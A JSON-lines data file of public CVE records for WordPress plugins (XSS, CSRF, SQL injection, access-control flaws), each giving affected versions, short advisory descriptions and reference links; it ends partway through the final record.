{"CVE_ID":"CVE-2022-4552","slug":"fl3r-feelbox","versionImpact":"8.1","description":"The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/307b0fe4-39de-4fbb-8bb0-f7f15ec6ef52\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/307b0fe4-39de-4fbb-8bb0-f7f15ec6ef52\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2767","slug":"wp-file-upload","versionImpact":"4.19.1","description":"The WordPress File Upload and WordPress File Upload Pro plugins for WordPress are vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 4.19.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23334d94-e5b8-4c88-8765-02ad19e17248?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23334d94-e5b8-4c88-8765-02ad19e17248?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4414","slug":"woocommerce-abandoned-cart","versionImpact":"5.8.5","description":"The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.8.5. This is due to missing or incorrect nonce validation on the wcal_preview_emails() function. This makes it possible for unauthenticated attackers to generate email preview templates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5d87d2-f3cb-4926-9cbf-acdbe9169f64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab5d87d2-f3cb-4926-9cbf-acdbe9169f64?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473720\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473720\\\/woocommerce-abandoned-cart\\\/trunk\\\/woocommerce-ac.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4944","slug":"awesome-weather","versionImpact":"3.0.2","description":"The Awesome Weather Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'awesome-weather' shortcode in versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L133\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf77988-370b-437f-83a0-18a147e3e087?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bf77988-370b-437f-83a0-18a147e3e087?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-weather\\\/tags\\\/3.0.2\\\/awesome-weather.php#L117\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48288","slug":"jobwp","versionImpact":"2.1","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin \u2013 JobWP. This issue affects WordPress Job Board and Recruitment Plugin \u2013 JobWP: from n\/a through 2.1.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-jobwp-plugin-2-1-sensitive-data-exposure-on-resume-files-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-jobwp-plugin-2-1-sensitive-data-exposure-on-resume-files-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4742","slug":"youzify","versionImpact":"1.2.5","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the order_by shortcode attribute in all versions up to, and including, 1.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08bd24ca-eec6-4b62-af49-192496e65a5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08bd24ca-eec6-4b62-af49-192496e65a5b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/functions\\\/youzify-account-verification-functions.php#L294\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/functions\\\/youzify-account-verification-functions.php#L294\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4643","slug":"bdthemes-element-pack-lite","versionImpact":"5.7.1","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018end_redirect_link\u2019 parameter in versions up to, and including, 5.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f281ef5-bb2e-42f9-be51-6f7bd3069f59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f281ef5-bb2e-42f9-be51-6f7bd3069f59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/countdown\\\/widgets\\\/countdown.php#L2501\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/countdown\\\/widgets\\\/countdown.php#L2501\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11891","slug":"perfect-font-awesome-integration","versionImpact":"2.3","description":"The Perfect Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pfai' shortcode in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202640%40perfect-font-awesome-integration&new=3202640%40perfect-font-awesome-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202640%40perfect-font-awesome-integration&new=3202640%40perfect-font-awesome-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/perfect-font-awesome-integration\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/perfect-font-awesome-integration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11aac185-191b-4f7b-8472-84d3decd582f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11aac185-191b-4f7b-8472-84d3decd582f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11929","slug":"responsive-flipbook","versionImpact":"2.5.0","description":"The Responsive FlipBook Plugin Wordpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the rfbwp_save_settings() function in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/responsive-flipbook-plugin\\\/2372863\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/responsive-flipbook-plugin\\\/2372863\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b24f9a-f225-40b5-9937-f7449d4832df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b24f9a-f225-40b5-9937-f7449d4832df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10867","slug":"borderless","versionImpact":"1.5.9","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88b0acee-f378-487d-8ab9-96146e0cde10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88b0acee-f378-487d-8ab9-96146e0cde10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13500","slug":"wedevs-project-manager","versionImpact":"2.6.17","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 2.6.17 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239348\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wedevs-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70083f93-f110-4029-a3d3-ce8a77799a31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70083f93-f110-4029-a3d3-ce8a77799a31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13559","slug":"templatesnext-toolkit","versionImpact":"3.2.9","description":"The TemplatesNext ToolKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tx_woo_wishlist_table' shortcode in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatesnext-toolkit\\\/trunk\\\/inc\\\/woo-compare-wishlist\\\/includes\\\/wishlist\\\/shortcode.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatesnext-toolkit\\\/trunk\\\/inc\\\/woo-compare-wishlist\\\/includes\\\/wishlist\\\/shortcode.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/775b6034-617a-4d84-a8fe-773ffbd9742a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/775b6034-617a-4d84-a8fe-773ffbd9742a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1530","slug":"tripetto","versionImpact":"8.0.9","description":"The Tripetto plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 8.0.9. This is due to missing nonce validation. This makes it possible for unauthenticated attackers to delete arbitrary results via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/capabilities.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tripetto\\\/trunk\\\/lib\\\/capabilities.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/results.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251202\\\/tripetto\\\/trunk\\\/admin\\\/results\\\/results.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tripetto\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tripetto\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd80abd9-3f41-414a-a781-9bff7d85ec4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd80abd9-3f41-414a-a781-9bff7d85ec4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3064","slug":"wpfront-user-role-editor","versionImpact":"4.2.1","description":"The WPFront User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.1. This is due to missing or incorrect nonce validation on the whitelist_options() function. This makes it possible for unauthenticated attackers to update the default role option that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-user-role-editor\\\/trunk\\\/includes\\\/users\\\/class-user-profile.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266542\\\/#file142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266542\\\/#file142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpfront-user-role-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpfront-user-role-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efc7ad9f-714e-474c-87e8-ecbbdfabd550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efc7ad9f-714e-474c-87e8-ecbbdfabd550?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32180","slug":"css3_tooltips","versionImpact":"1.8","description":"Missing Authorization vulnerability in QuanticaLabs CSS3 Tooltips for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CSS3 Tooltips for WordPress: from n\/a through 1.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_tooltips\\\/vulnerability\\\/wordpress-css3-tooltips-for-wordpress-1-8-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_tooltips\\\/vulnerability\\\/wordpress-css3-tooltips-for-wordpress-1-8-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5234","slug":"gutenverse-news","versionImpact":"1.0.4","description":"The Gutenverse News plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018elementId\u2019 parameter in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse-news\\\/tags\\\/1.0.4\\\/include\\\/class\\\/block\\\/class-grab.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse-news\\\/tags\\\/1.0.4\\\/include\\\/class\\\/block\\\/class-grab.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/gutenverse-news\\\/trunk\\\/include\\\/class\\\/block\\\/class-grab.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313123\\\/gutenverse-news\\\/trunk\\\/include\\\/class\\\/block\\\/class-grab.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse-news\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse-news\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8b1f60a-3a13-4679-af3e-d6f95fd83cea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8b1f60a-3a13-4679-af3e-d6f95fd83cea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23884","slug":"kanban","versionImpact":"2.5.20","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Kanban for WordPress Kanban Boards for WordPress plugin <=\u00a02.5.20 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-20-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2764","slug":"draw-attention","versionImpact":"2.0.11","description":"The Draw Attention plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_set_featured_image function in versions up to, and including, 2.0.11. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the featured image of arbitrary posts with an image that exists in the media library.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18530601-a294-448c-a1b2-c3995f9042ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18530601-a294-448c-a1b2-c3995f9042ac?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/draw-attention\\\/trunk\\\/public\\\/includes\\\/lib\\\/drag-drop-featured-image\\\/index.php#L500\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/draw-attention\\\/trunk\\\/public\\\/includes\\\/lib\\\/drag-drop-featured-image\\\/index.php#L500\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917528\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917528\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4413","slug":"process-steps-template-designer","versionImpact":"1.2.1","description":"The Process Steps Template Designer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save field icons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98f6a68-5863-4147-86c4-8c19af469be3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a98f6a68-5863-4147-86c4-8c19af469be3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473649%40process-steps-template-designer&new=2473649%40process-steps-template-designer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473649%40process-steps-template-designer&new=2473649%40process-steps-template-designer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fi